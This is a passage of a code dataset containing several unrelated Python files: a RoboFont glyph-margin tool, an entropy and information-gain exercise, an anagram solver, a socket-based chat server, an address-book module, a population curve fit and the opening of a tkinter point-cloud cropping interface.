leftUnits\n\n if adjustComponents:\n for comp in g.components:\n if comp.baseGlyph in gnames:\n comp.offset = (comp.offset[0]-leftUnits, comp.offset[1])\n #print('adjusting', g, 'leftMargin by', leftUnits, 'units')\n if rightUnits != 0:\n # RF3\n if version >= \"3.0\":\n if g.bounds:\n g.rightMargin += rightUnits\n else:\n g.width += rightUnits\n # RF1\n else:\n if g.box:\n g.rightMargin += rightUnits\n else:\n g.width += rightUnits\n g.performUndo()\n\ndef multiplyMargins(f, gnames, leftMultiplier=1, rightMultiplier=1, roundValues=1, adjustComponents=True):\n marginRecords = {}\n # Step 1: Compile records\n for gname in gnames:\n leftUnits, rightUnits = 0, 0\n if gname in f:\n g = f[gname]\n if leftMultiplier != 1:\n leftUnits = (leftMultiplier * g.leftMargin) - g.leftMargin\n if rightMultiplier != 1:\n rightUnits = (rightMultiplier * g.rightMargin ) - g.rightMargin\n if roundValues != 0:\n leftUnits = round(leftUnits, roundValues)\n rightUnits = round(rightUnits, roundValues)\n marginRecords[g.name] = leftUnits, rightUnits\n # Make changes\n for gname in gnames:\n if gname in f:\n g = f[gname]\n g.prepareUndo('multiplyMargins')\n leftUnits, rightUnits = marginRecords[gname]\n g.leftMargin += leftUnits\n g.rightMargin += rightUnits\n if adjustComponents:\n for comp in g.components:\n if comp.baseGlyph in gnames:\n compLeftUnits, compRightUnits = marginRecords[comp.baseGlyph]\n comp.offset = (comp.offset[0]-compLeftUnits, comp.offset[1])\n g.performUndo()\n\nclass AdjustMetrics(BaseWindowController):\n\n WINDOWTITLE = u'Adjust Metrics'\n\n def __init__(self):\n\n #layout variables\n width = 250\n height = 500\n x = 20\n y = 20\n rightMargin = -20\n itemHeight = 22\n lineHeight = 25\n\n fonts = AllFonts()\n self.fonts = sortFonts(fonts)\n current = CurrentFont()\n\n # Window\n\n self.w = FloatingWindow((width, height), self.WINDOWTITLE, autosaveName=self.WINDOWTITLE, minSize=(width, height))\n\n # Adjust Both\n self.w.adjustBothText = TextBox((x, y, rightMargin, itemHeight), 'Adjust Both Margins')\n y+=lineHeight\n self.w.adjustBothValue = EditText((x, y, 50, itemHeight), callback=self.adjustBothValueCallback)\n x+=60\n self.w.adjustBothUnit = RadioGroup((x, y, 120, itemHeight*2), ['Units', 'Percent'], callback=self.adjustBothUnitCallback)\n self.w.adjustBothUnit.set(0)\n x = 20\n y += lineHeight * 2.5\n\n # Adjust Left\n self.w.adjustLeftText = TextBox((x, y, rightMargin, itemHeight), 'Adjust Left Margin')\n y+=lineHeight\n self.w.adjustLeftValue = EditText((x, y, 50, itemHeight), callback=self.clearBothCallback)\n x+=60\n self.w.adjustLeftUnit = RadioGroup((x, y, 120, itemHeight*2), ['Units', 'Percent'], callback=self.clearBothCallback)\n self.w.adjustLeftUnit.set(0)\n x = 20\n y += lineHeight * 2.5\n\n # Adjust Right\n self.w.adjustRightText = TextBox((x, y, rightMargin, itemHeight), 'Adjust Right Margin')\n y+=lineHeight\n self.w.adjustRightValue = EditText((x, y, 50, itemHeight), callback=self.clearBothCallback)\n x+=60\n self.w.adjustRightUnit = RadioGroup((x, y-3, 120, itemHeight*2), ['Units', 'Percent'], callback=self.clearBothCallback)\n self.w.adjustRightUnit.set(0)\n x = 20\n y += lineHeight * 2.5\n\n # Glyph Selection\n self.w.glyphSelection = RadioGroup((x, y, rightMargin, itemHeight*2), ['Current Glyph Selection', 'All Glyphs'])\n self.w.glyphSelection.set(0)\n\n y += lineHeight * 2.5\n\n # Components\n self.w.adjustComponents = CheckBox((x, y, rightMargin, itemHeight), 'Adjust Components')\n self.w.adjustComponents.set(1)\n\n y += lineHeight\n\n # Transform\n self.w.adjustBaseComponents = CheckBox((x, y, rightMargin, itemHeight), 'Adjust Comps with Selected')\n self.w.adjustBaseComponents.set(0)\n\n y += lineHeight\n\n # Transform\n self.w.ignoreZeroWidth = CheckBox((x, y, rightMargin, itemHeight), 'Ignore Zero-Width Glyphs')\n self.w.ignoreZeroWidth.set(1)\n\n self.w.apply = Button((x, -40, 100, itemHeight), 'Apply', callback=self.apply)\n self.w.cancel = Button((x+110, -40, 100, itemHeight), 'Close', callback=self.cancel)\n\n # Font Selection Drawer\n\n self.fs = Drawer((200, 150), self.w)\n fsx = 5\n fsy = 5\n\n self.fs.selectAllFonts = Button((fsx, fsy, -55, itemHeight), 'Select All Fonts', callback=self.selectAllFonts, sizeStyle='small')\n self.fs.refreshFontList = Button((-35, fsy, 30, 22), u'↺', callback=self.refreshFontList)\n\n fsy += 25\n self.fs.deselectAllFonts = Button((fsx, fsy, -55, itemHeight), 'Deselect All Fonts', callback=self.deselectAllFonts, sizeStyle='small')\n fsy += 25\n self.fs.selectCurrentFont = Button((fsx, fsy, -55, itemHeight), 'Select Current Font', callback=self.selectCurrentFont, sizeStyle='small')\n fsy += 25\n\n fontNameList = []\n currentIndex = None\n for x, f in enumerate(self.fonts):\n fontName = str(f.info.familyName)+' '+str(f.info.styleName)\n if fontName in fontNameList:\n fontName = f.path\n fontNameList.append(fontName)\n if f == CurrentFont():\n currentIndex = x\n fsy += 5\n self.fs.fontSelect = List((fsx, fsy, -5, -5), fontNameList)\n if currentIndex is not None:\n self.fs.fontSelect.setSelection([currentIndex])\n\n self.w.open()\n self.fs.open()\n\n def refreshFontList(self, sender):\n self.fonts = sortFonts(AllFonts())\n fontNameList = []\n currentIndex = None\n for x, f in enumerate(self.fonts):\n fontName = str(f.info.familyName)+' '+str(f.info.styleName)\n if fontName in fontNameList:\n fontName = f.path\n fontNameList.append(fontName)\n if f == CurrentFont():\n currentIndex = x\n self.fs.fontSelect.set(fontNameList)\n self.fs.fontSelect.setSelection([currentIndex])\n\n def adjustBothUnitCallback(self, sender):\n self.w.adjustLeftUnit.set(sender.get())\n self.w.adjustRightUnit.set(sender.get())\n\n def adjustBothValueCallback(self, sender):\n self.w.adjustLeftValue.set(sender.get())\n self.w.adjustRightValue.set(sender.get())\n\n def clearBothCallback(self, sender):\n self.w.adjustBothValue.set('')\n\n def selectAllFonts(self, sender):\n indexRange = range(0, len(self.fonts))\n self.fs.fontSelect.setSelection(indexRange)\n\n def deselectAllFonts(self, sender):\n self.fs.fontSelect.setSelection([])\n\n def selectCurrentFont(self, sender):\n for x, f in enumerate(self.fonts):\n if f == CurrentFont():\n currentIndex = x\n self.fs.fontSelect.setSelection([currentIndex])\n\n def getSelectedFonts(self):\n selectedFonts = []\n for index in self.fs.fontSelect.getSelection():\n selectedFonts.append(self.fonts[index])\n return selectedFonts\n\n def makeMetricsAdjustment(self, f, gnames):\n \"\"\"\n \"\"\"\n if self.w.ignoreZeroWidth.get():\n newGnames = []\n for gname in gnames:\n if f[gname].width != 0:\n newGnames.append(gname)\n gnames = newGnames\n\n if self.w.adjustComponents.get():\n adjustComponents = True\n else:\n adjustComponents = False\n # get values\n adjustLeftUnit = self.w.adjustLeftUnit.get()\n adjustRightUnit = self.w.adjustRightUnit.get()\n\n try:\n leftValue = int(self.w.adjustLeftValue.get())\n except:\n if adjustLeftUnit == 0:\n leftValue = 0\n else:\n leftValue = 1\n try:\n rightValue = int(self.w.adjustRightValue.get())\n except:\n if adjustRightUnit == 0:\n rightValue = 0\n else:\n rightValue = 1\n\n if adjustLeftUnit == 0:\n if adjustRightUnit == 0:\n addMargins(f, gnames, leftValue, rightValue, adjustComponents=adjustComponents)\n else:\n addMargins(f, gnames, leftValue, 0, adjustComponents=adjustComponents)\n multiplyMargins(f, gnames, 1, rightValue*.01, adjustComponents=adjustComponents)\n if adjustLeftUnit == 1:\n if adjustRightUnit == 1:\n multiplyMargins(f, gnames, leftValue*.01, rightValue*.01, adjustComponents=adjustComponents)\n else:\n multiplyMargins(f, gnames, leftValue*.01, 1, adjustComponents=adjustComponents)\n addMargins(f, gnames, 0, rightValue, adjustComponents=adjustComponents)\n\n # RF3\n if version >= \"3.0\":\n f.changed()\n # RF1\n else:\n f.update()\n\n def apply(self, sender):\n\n fonts = self.getSelectedFonts()\n\n for f in fonts:\n\n if self.w.glyphSelection.get() == 0:\n gnames = CurrentFont().selectedGlyphNames\n else:\n gnames = f.keys()\n\n\n if self.w.adjustBaseComponents.get():\n additionalGnames = []\n for g in f:\n if len(g.components) >= 1 and ( g.components[0].baseGlyph in gnames ) and ( g.name not in gnames ):\n additionalGnames.append(g.name)\n gnames += additionalGnames\n\n print(f, gnames)\n self.makeMetricsAdjustment(f, gnames)\n\n def cancel(self, sender):\n self.w.close()\n\nOpenWindow(AdjustMetrics)\n\n","repo_name":"FontBureau/fbOpenTools","sub_path":"AdjustMetrics/AdjustMetrics.roboFontExt/lib/adjustMetrics.py","file_name":"adjustMetrics.py","file_ext":"py","file_size_in_byte":11998,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"99"} +{"seq_id":"38271049636","text":"#!/usr/bin/env python3\nfrom math import log2\n\nglobal FeatureList, FeatureValues, Data\nFeatureList = ['Deadline', 'Party', 'Lazy']\nFeatureValues = {'Deadline': ['None', 'Near', 'Urgent'], 'Party': ['No', 'Yes'], 'Lazy': ['No', 'Yes'], 'Ans': ['Party', 'Study', 'Pub', 'TV']}\nData = [{'Deadline': 'Urgent', 'Party': 'Yes', 'Lazy': 'Yes', 'Ans': 'Party'}, {'Deadline': 'Urgent', 'Party': 'No', 'Lazy': 'Yes', 'Ans': 'Study'}, {'Deadline': 'Near', 'Party': 'Yes', 'Lazy': 'Yes', 'Ans': 'Party'}, {'Deadline': 'None', 'Party': 'Yes', 'Lazy': 'No', 'Ans': 'Party'}, {'Deadline': 'None', 'Party': 'No', 'Lazy': 'Yes', 'Ans': 'Pub'}, {'Deadline': 'None', 'Party': 'Yes', 'Lazy': 'No', 'Ans': 'Party'}, {'Deadline': 'Near', 'Party': 'No', 'Lazy': 'No', 'Ans': 'Study'}, {'Deadline': 'Near', 'Party': 'No', 'Lazy': 'Yes', 'Ans': 'TV'}, {'Deadline': 'Near', 'Party': 'Yes', 'Lazy': 'Yes', 'Ans': 'Party'}, {'Deadline': 'Urgent', 'Party': 'No', 'Lazy': 'No', 'Ans': 'Study'}]\n\n# list of the items in data that have feature equal to value\ndef select(data, feature, value) :\n return [ item for item in data if item[feature]==value ]\n\n\n# count how many items in the data have feature equal to value\ndef count(data, feature, value) :\n num = 0\n for d in data :\n if d[feature]==value : num+=1\n return num\n\n\n# what is the entropy of a question about feature?\n# sum the entropy over the possible values of the feature.\ndef entropy(data, feature) :\n result = 0\n for f in FeatureValues[feature]:\n p = len(select(data, feature, f)) / len(data)\n result += calc_entropy(p)\n return result\n\ndef calc_entropy(p):\n if p != 0:\n return -p * log2(p)\n else:\n return 0\n\n# current entropy - expected entropy after getting info about feature\n# entropy(data, \"Ans\") - sum_{v=featurevalues} p_v * entropy(select(data, feature, v), \"Ans\")\ndef gain(data, feature) :\n Entropy_S = entropy(data, 'Ans')\n\n for val in FeatureValues[feature]:\n p = count(data, feature, val) / len(data)\n subset = select(data, feature, val)\n print(Entropy_S, entropy(subset, 'Ans'))\n Entropy_S -= p * entropy(subset, 'Ans')\n return Entropy_S\n","repo_name":"idahood/CS575","sub_path":"assign2/entropy_gain.py","file_name":"entropy_gain.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73814962886","text":"class Solution:\n\tdef anagrams(self, A):\n\t\ttable = {}\n\t\tfor idx, val in enumerate(A):\n\t\t\tkey = 1\n\t\t\tfor j in val:\n\t\t\t\tkey *= ord(j)\n\t\t\tif table.get(key, None) != None:\n \ttable[key].append(idx + 1)\n\t\t\telse:\n\t\t\t\ttable[key] = []\n\t\t\t\ttable[key].append(idx + 1)\n\t\tans = []\n\t\tfor j, i in table.items():\n\t\t\tans.append(i)\n\t\treturn ans\n \t\t\t\n\t\t\t\t\n\n\n\n\nsol = Solution()\nA = ['cat', 'dog', 'god', 'tca']\nprint(sol.anagrams(A))\n","repo_name":"Ken1g/InterviewBit","sub_path":"Tasks/Hash/anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29169396950","text":"import socket\nimport sys\nimport select\nimport struct\nimport queue\nimport time\n\nclass chat_server:\n\tdef __init__(self,port,verbose=False):\n\t\tself.waiting_for_accept = [] #contain user ids waiting for ok\n\t\tself.user_count = 0\n\t\tself.PORT = port\n\t\tself.next_id = 1\n\t\tself.SERVER_ID = 65535\n\t\tself.verbose=verbose\n\t\t#socket - id map\n\t\t# {'sock':, 'id':int}\n\t\tself.mapping = []\n\t\t#ids avaible for reallocating\n\t\tself.freed_ids = []\n\t\t#list waiting for msg confirmations\n\t\t#{'type':int with message type,'seq':sequence number of msg}]\n\t\tself.wait_confirmation = []\n\n\tdef allocate_id(self):\n\t\tif not self.freed_ids:\n\t\t\tnext_id = self.next_id\n\t\t\tself.next_id += 1\n\t\t\tself.waiting_for_accept.append(next_id)\n\t\t\tif self.next_id > self.SERVER_ID:\n\t\t\t\tnext_id = -1\n\t\t\treturn next_id\n\t\telse:\n\t\t\treturn self.freed_ids.pop()\n\tdef create_message(self,msg,msgtype,destination,seq):\n\t\t'''\n\t\tHeader (in bytes):\n\t\t[MSG TYPE] [ORIGIN ID] [DESTINATION ID] [SEQ_NUM]\n\t\t0 1 2 3 4\t\t\t 5 6 8\n\t\tMSG TYPES:\n\t\t|1 OK\t: Accepted msgs |5 MSG* : Actual chat msgs |\n\t\t|\t\t sends ok |\t\t have msg size in |\n\t\t|2 ERRO\t: Refused msgs |\t\t header + msg bytes |\n\t\t|\t\t sends erro\t|6 CREQ : Ask for clients |\n\t\t|3 OI\t: Joining client|\t\t server sends clist |\n\t\t|\t\t sends oi |7 CLIST : number n of clients|\n\t\t|4 FLW\t: Leaving client| in header + n |\n\t\t|\t\t sends flw |\t\t clients numbers |\n\n\t\t* MSG size are 2 bytes, length guaranteed to be < 400 chars\n\t\t** When client gets answered from msg type 3 it receives\n\t\tat destination id his allocated id\n\t\t'''\n\t\tframe = bytes()\n\t\tframe += struct.pack('!H',msgtype)\n\t\tframe += struct.pack('!H',self.SERVER_ID)\n\t\tframe += struct.pack('!H',destination)\n\t\tframe += struct.pack('!H',seq)\n\t\tif msgtype == 5:\n\t\t\tmsg_len = len(msg)\n\t\t\tframe += struct.pack('!H',msg_len)\n\t\t\tframe += msg.encode()\t\n\t\tif msgtype == 7:\n\t\t\tframe += struct.pack('!H',self.user_count)\n\t\t\tfor i in self.mapping:\n\t\t\t\tid_int = i['id']\n\t\t\t\tif id_int != self.SERVER_ID:\n\t\t\t\t\tframe += struct.pack('!H',id_int)\n\t\treturn frame\n\n\tdef receive_message(self,sock):\n\t\t#retrieve socket id for verbose printing\n\t\tfor i in self.mapping:\n\t\t\tif sock == i['sock']:\n\t\t\t\tsock_id = i['id']\n\t\t#receive bytes from socket\n\t\tmsg_type = sock.recv(2)\n\t\tif not msg_type: return\n\t\torigin = sock.recv(2)\n\t\tdestination = sock.recv(2)\n\t\tseq_num = sock.recv(2)\n\t\t#convertion from bytes to unsigned shorts\n\t\torig_int = struct.unpack('!H',origin)[0]\n\t\tseq_int = struct.unpack('!H',seq_num)[0]\n\t\tdest_int = struct.unpack('!H',destination)[0]\n\t\tmsg_int_type = struct.unpack('!H',msg_type)[0]\n\t\t#appending packet for verbose printing or forwading msg\n\t\tpacket = bytes()\n\t\tpacket += msg_type + origin + destination + seq_num\n\t\t#treats \"OK\" messages\n\t\tif msg_int_type == 1:\n\t\t\tfor i in self.wait_confirmation[:]:\n\t\t\t\tif seq_int == i['seq']:\n\t\t\t\t\tself.wait_confirmation.remove(i)\n\t\t\t\tsock.settimeout(0.0)\n\t\t#treats \"OI\" messages\n\t\telif msg_int_type == 3:\n\t\t\tnew_id = self.allocate_id()\n\t\t\tfor i in self.mapping:\n\t\t\t\tif sock is i['sock']:\n\t\t\t\t\ti['id'] = new_id\n\t\t\tself.user_count += 1\n\t\t\tid_alloc_frame = self.create_message('',1,new_id,seq_int)\n\t\t\tself.message_queues[sock].put(id_alloc_frame)\n\t\t\tif sock not in self.outputs:\n\t\t\t\tself.outputs.append(sock)\n\t\t\tif self.verbose:\n\t\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\t\treturn\n\t\t#treats \"MSG\" messages\n\t\telif msg_int_type == 5:\n\t\t\tfor i in self.mapping:\n\t\t\t\tif i['id'] == orig_int:\n\t\t\t\t\tif i['sock'] is not sock:\n\t\t\t\t\t\treturn\n\t\t\tn_size = sock.recv(2)\n\t\t\tn_int = struct.unpack('!H',n_size)[0]\n\t\t\treceived_msg = sock.recv(n_int)\n\t\t\tpacket += n_size + received_msg\n\t\t\t#forwarding of messages\n\t\t\tif dest_int != 0:\n\t\t\t\tdest_sock = None\n\t\t\t\tfor i in self.mapping:\n\t\t\t\t\tif i['id'] == dest_int:\n\t\t\t\t\t\tdest_sock = i['sock']\n\t\t\t\tif dest_sock:\n\t\t\t\t\tself.message_queues[dest_sock].put(packet)\n\t\t\t\t\t# sock.setblocking(1)\n\t\t\t\t\t# sock.settimeout(5)\n\t\t\t\t\tif dest_sock not in self.outputs:\n\t\t\t\t\t\tself.outputs.append(dest_sock)\n\t\t\t\t\tok_frame = self.create_message('',1,orig_int,seq_int)\n\t\t\t\t\tself.message_queues[sock].put(ok_frame)\n\t\t\t\t\tif sock not in self.outputs:\n\t\t\t\t\t\tself.outputs.append(sock)\n\t\t\t\t\tif self.verbose:\n\t\t\t\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\t\t\t\treturn \n\t\t\t\telse:\n\t\t\t\t\terror_frame = self.create_message('',2,orig_int,seq_int)\n\t\t\t\t\tself.message_queues[sock].put(error_frame)\n\t\t\t\t\tif sock not in self.outputs:\n\t\t\t\t\t\tself.outputs.append(sock)\n\t\t\t\t\tif self.verbose:\n\t\t\t\t\t\tprint('Received msg',packet,'from id', sock_id)\n\t\t\t\t\treturn\n\t\t\t#Broadcast\n\t\t\telse:\n\t\t\t\tif self.verbose:\n\t\t\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\t\t\tok_frame = self.create_message('',1,orig_int,seq_int)\n\t\t\t\tself.message_queues[sock].put(ok_frame)\n\t\t\t\tif sock not in self.outputs:\n\t\t\t\t\tself.outputs.append(sock)\n\t\t\t\tfor i in self.mapping:\n\t\t\t\t\tdest_sock = None\n\t\t\t\t\tif i['id'] != self.SERVER_ID and i['id'] != orig_int:\n\t\t\t\t\t\tdest_sock = i['sock']\n\t\t\t\t\tif dest_sock:\n\t\t\t\t\t\tself.message_queues[dest_sock].put(packet)\n\t\t\t\t\t\tif dest_sock not in self.outputs:\n\t\t\t\t\t\t\tself.outputs.append(dest_sock)\n\t\t\t\treturn\n\n\t\t#treats \"CREQ\" messages\n\t\telif msg_int_type == 6:\n\t\t\tlist_frame = self.create_message('',7,orig_int,seq_int)\n\t\t\tself.message_queues[sock].put(list_frame)\n\t\t\tif sock not in self.outputs:\n\t\t\t\tself.outputs.append(sock)\n\t\t#treats \"FLW\" messages\n\t\telif msg_int_type == 4:\n\t\t\tself.freed_ids.append(sock_id)\n\t\t\tself.user_count -= 1\n\t\t\tfor i in self.mapping[:]:\n\t\t\t\tif i['id'] == sock_id:\n\t\t\t\t\tself.mapping.remove(i)\n\t\t\tok_frame = self.create_message('',1,orig_int,seq_int)\n\t\t\tself.message_queues[sock].put(ok_frame)\n\t\t\tif sock not in self.outputs:\n\t\t\t\tself.outputs.append(sock)\n\t\tif self.verbose:\n\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\treturn\n\n\tdef run(self):\n\t\tS_ADDR = ('',self.PORT)\n\t\tMAX_CON = 65534\n\t\tserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\t\n\t\tserver.setblocking(0)\n\n\t\tserver.bind(S_ADDR)\n\t\tserver.listen(MAX_CON)\t\n\n\t\t#messages lists\n\t\tself.inputs = [ server ]\n\t\tself.outputs = []\n\t\tself.message_queues = {}\n\n\t\tself.mapping.append({'sock':server,'id':self.SERVER_ID})\n\t\ttry:\n\t\t\twhile self.inputs:\n\t\t\t\t# time.sleep(5)\n\t\t\t\treadable, writable, exceptional = select.select(self.inputs,self.outputs,self.inputs)\n\t\t\t\t#Handling inputs\t\n\t\t\t\tfor s in readable:\n\t\t\t\t\tif s is server:\n\t\t\t\t\t\t#Accepts new connections\n\t\t\t\t\t\tconnection, addr = s.accept()\n\t\t\t\t\t\tconnection.setblocking(0)\n\t\t\t\t\t\t# connection.settimeout(1)\n\t\t\t\t\t\tself.inputs.append(connection)\n\t\t\t\t\t\tself.mapping.append({'sock':connection,'id':0})\n\t\t\t\t\t\t#creates queue for message\n\t\t\t\t\t\tself.message_queues[connection] = queue.Queue()\n\t\t\t\t\telse:\n\t\t\t\t\t\t#Receives data\n\t\t\t\t\t\taswr = self.receive_message(s)\n\t\t\t\t#Handling outputs\n\t\t\t\tfor s in writable:\t\n\t\t\t\t\ttry:\n\t\t\t\t\t\tnext_msg = self.message_queues[s].get_nowait()\n\t\t\t\t\texcept queue.Empty:\n\t\t\t\t\t\tself.outputs.remove(s)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.verbose:\n\t\t\t\t\t\t\tfor i in self.mapping:\n\t\t\t\t\t\t\t\tif s == i['sock']:\n\t\t\t\t\t\t\t\t\tsock_id = i['id']\n\t\t\t\t\t\t\tprint('sending',next_msg,'to id',sock_id)\n\t\t\t\t\t\ts.send(next_msg)\n\t\t\t\t\t\t\t\n\t\t\t\tfor s in exceptional:\n\t\t\t\t\tself.inputs.remove(s)\n\t\t\t\t\tif s in outputs:\n\t\t\t\t\t\tself.outputs.remove(s)\n\t\t\t\t\ts.close()\n\t\t\n\t\t\t\t\tdel self.message_queues[s]\n\t\texcept socket.timeout:\n\t\t\tself.freed_ids.append(sock_id)\n\t\t\tself.user_count -= 1\n\t\t\tfor i in self.mapping[:]:\n\t\t\t\tif i['id'] == sock_id:\n\t\t\t\t\tself.mapping.remove(i)\n\nif __name__ == '__main__':\n\targc = len(sys.argv)\n\tif argc == 3:\n\t\tif sys.argv[2] == '-v':\n\t\t\tserver = chat_server(int(sys.argv[1]),verbose=True)\n\t\telse:\n\t\t\tprint('Wrong arg')\n\t\t\tsys.exit(0)\n\telif argc == 2:\n\t\tserver = chat_server(int(sys.argv[1]))\n\telse:\n\t\tprint('Wrong arg format')\n\t\tsys.exit(0)\n\tserver.run()\n","repo_name":"giovannitgl/py_chat","sub_path":"chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":7650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73727175685","text":"from collections import UserDict, UserList\nimport pickle\nfrom faker import Faker\nfrom normalize import normalize\nfrom datetime import datetime, timedelta\nfrom itertools import islice\n\n\nclass Field:\n def __init__(self, value) -> None:\n self.value = value\n\n def __str__(self) -> str:\n return self.value\n\n def __repr__(self) -> str:\n return str(self)\n\n\nclass Name(Field):\n ...\n\n\nclass IncorrectData(Exception):\n ...\n\n\nclass Iteraror(UserList):\n def __init__(self, list):\n self.list = list\n\n\nclass Phone(Field):\n @property\n def value(self):\n return self.__value\n\n @value.setter\n def value(self, value):\n if 7 <= len(value) <= 13:\n self.__value = value\n else:\n raise IncorrectData(\"Number to shot or to long\")\n\n\nclass Birthday(Field):\n @property\n def value(self):\n return self.__value\n\n @value.setter\n def value(self, value: str) -> str:\n test = value.split(\"-\")\n if (\n 0 < int(test[0]) <= 31\n and 0 < int(test[1]) <= 12\n and (datetime.now() - timedelta(days=54750)).year\n < int(test[2])\n < (datetime.now() + timedelta(days=54750)).year\n ):\n self.__value = value\n\n else:\n raise IncorrectData(\n \"Wrong Date Format or date out of range > Need:dd-mm-YYYY |example: 01-01-2001\"\n )\n\n\nclass Record:\n def __init__(\n self, name: Name, phone: Phone = None, birthday: Birthday = None\n ) -> None:\n self.birthday = birthday\n self.name = name\n self.phones = []\n if phone:\n self.phones.append(phone)\n\n def days_to_birthday(self) -> str:\n input_data = self.birthday\n current_data = datetime.now()\n input_data = datetime.strptime(str(self.birthday), \"%d-%m-%Y\")\n old = current_data.year - input_data.year\n change_year = input_data.replace(year=current_data.year)\n left_to_bd = change_year - current_data\n if left_to_bd.days < 0:\n left_to_bd += timedelta(days=365)\n return f\"{left_to_bd.days} days remained until the birthday.Will be {old} years old\"\n\n def add_phone(self, phone: Phone) -> str:\n if phone.value not in [p.value for p in self.phones]:\n self.phones.append(phone)\n return f\"phone {phone} add to contact {self.name}\"\n return f\"{phone} present in phones of contact {self.name}\"\n\n def change_phone(self, old_phone, new_phone) -> str:\n for idx, p in enumerate(self.phones):\n if old_phone.value == p.value:\n self.phones[idx] = new_phone\n\n return f\"old phone {old_phone} change to {new_phone}\"\n return f\"{old_phone} not present in phones of contact {self.name}\"\n\n def del_phone(self, phone: Phone) -> str:\n for p in self.phones:\n if p.value == phone.value:\n self.phones.remove(p)\n\n return f\"number {phone} has been deleted in contact {self.name}\"\n\n return f\"{phone} not present in phones of contact {self.name}\"\n\n def __str__(self) -> str:\n return f\"{self.name}: {', '.join(str(p) for p in self.phones)} Bd |{self.birthday if self.birthday else f'Not record'}|\"\n\n\nclass AdressBook(UserDict):\n def search_contacts(self, find_string: str) -> list:\n find_list = [\n str(val) for val in self.values() if find_string.lower().strip() in str(val)\n ]\n return find_list\n\n def iterator(self, n: int) -> Iteraror:\n value_list = [value for value in self.values()]\n start = 0\n finish = n\n gen_list = []\n while start < len(value_list):\n gen = islice(value_list, start, finish)\n start += n\n finish = start + n\n gen_list.append(gen)\n iterator = Iteraror(gen_list)\n return iterator\n\n def load_phone_book(self) -> str:\n with open(\"phone_book.bin\", \"rb\") as file:\n self.data = pickle.load(file)\n return f\"Phone book has been loaded\"\n\n def clear_phone_book(self) -> str:\n self.clear()\n return \"Phone book is clear now\"\n\n def add_record(self, record: Record) -> str:\n self.data[str(record.name)] = record\n return f\"Contact {record} add success\"\n\n def del_record(self, rec: Record) -> str:\n del_rec = self.pop(rec.name.value)\n return f\"contact {del_rec} has been deleted\"\n\n def __str__(self) -> str:\n return \"\\n\".join(str(r) for r in self.data.values())\n","repo_name":"Roll1ngo/HomeWorks_PythonCore_archive","sub_path":"HW_11_12/ab_classes.py","file_name":"ab_classes.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7418683721","text":"import numpy as np\r\nimport pandas as pd\r\nfrom scipy.optimize import curve_fit\r\n\r\ndef f(x, a, b):\r\n return a*b**x\r\n\r\ndata = pd.read_csv(\"populasjon2.csv\")\r\n\r\nparam, info = curve_fit(f, data.maaned, data.populasjon)\r\na=param[0]\r\nb=param[1]\r\n\r\nprint(f\"Denne modelen gir f(x)={a:.2f}*{b:.2f}^x\")\r\nx_verdier=np.linspace(0,len(data.maaned),100)\r\n\r\ny=(f(50, *param)) #Verdi for f(50)\r\n \r\npopulasjon = data.populasjon.tolist()\r\navvik=(populasjon[50]-y)\r\n\r\nprint(f\"Avviket mellom modellen og virkeligheten for x=50 er {avvik:.2f}\")","repo_name":"kaareskokebok/losninger_programmering","sub_path":"kap13/13_opg12B.py","file_name":"13_opg12B.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32464609291","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport Detection_Model\n\n\ndef browse_file(file_entry):\n # Function to browse and select a file\n window.update() # Update the main window to fix focus issues\n file_path = filedialog.askopenfilename(parent=window, title=\"Select File\", filetypes=((\"All Files\", \"*.*\"),))\n file_entry.delete(0, tk.END)\n file_entry.insert(0, file_path)\n\ndef upload_files():\n # Function to handle the \"Process\" button click event\n file_paths = [entry.get() for entry in file_entries]\n upload_button.config(state=tk.DISABLED) # Disable the \"Process\" button\n class_data, image_dimensions, image_original_size = Detection_Model.receive_file(file_paths) # Get the class_data after processing\n display_class_selection(class_data, image_dimensions, image_original_size) # Display the class_data for user selection\n\ndef display_class_selection(class_data,image_dimensions, image_original_size):\n # Function to display the class selection interface\n class_names = list(class_data.keys())\n class_selection_window = tk.Toplevel(window)\n class_selection_window.title(\"Select Class\")\n class_selection_window.geometry(\"400x400\") # Set the size of the class selection window\n selected_classes = []\n\n def update_selected_classes():\n # Function to handle the \"Submit\" button click event\n process_selected_classes(selected_classes,class_data, image_dimensions, image_original_size)\n class_selection_window.destroy()\n inform_user()\n \n submit_button = tk.Button(class_selection_window, text=\"Submit\", command=update_selected_classes)\n submit_button.pack(pady=10)\n\n def toggle_class(name):\n # Function to handle the check button toggle event\n if name in selected_classes:\n selected_classes.remove(name)\n else:\n selected_classes.append(name)\n\n for potential_class_name in class_names:\n check_button = tk.Checkbutton(class_selection_window, text=potential_class_name, command=lambda name=potential_class_name: toggle_class(name))\n check_button.pack(anchor=tk.W)\n\ndef process_selected_classes(selected_classes,class_data, image_dimensions, image_original_size):\n # Function to process the selected classes\n keys_list_set = set(selected_classes)\n keys_to_remove = []\n for key in class_data.keys():\n if key not in keys_list_set:\n keys_to_remove.append(key)\n for key in keys_to_remove:\n del class_data[key]\n \n Detection_Model.cropping(class_data, image_dimensions, image_original_size) # Perform further processing in Detection_Model.py\n\ndef inform_user():\n # Function to inform the user about the completion of the model running\n messagebox.showinfo(\"Process Completed\", \"Model running is completed!\") # Display a message box to inform the user\n window.destroy() # Close the Point Cloud Cropping interface\n\n# Create the main window\nwindow = tk.Tk()\nwindow.geometry(\"750x400\")\nwindow.title(\"Point Cloud 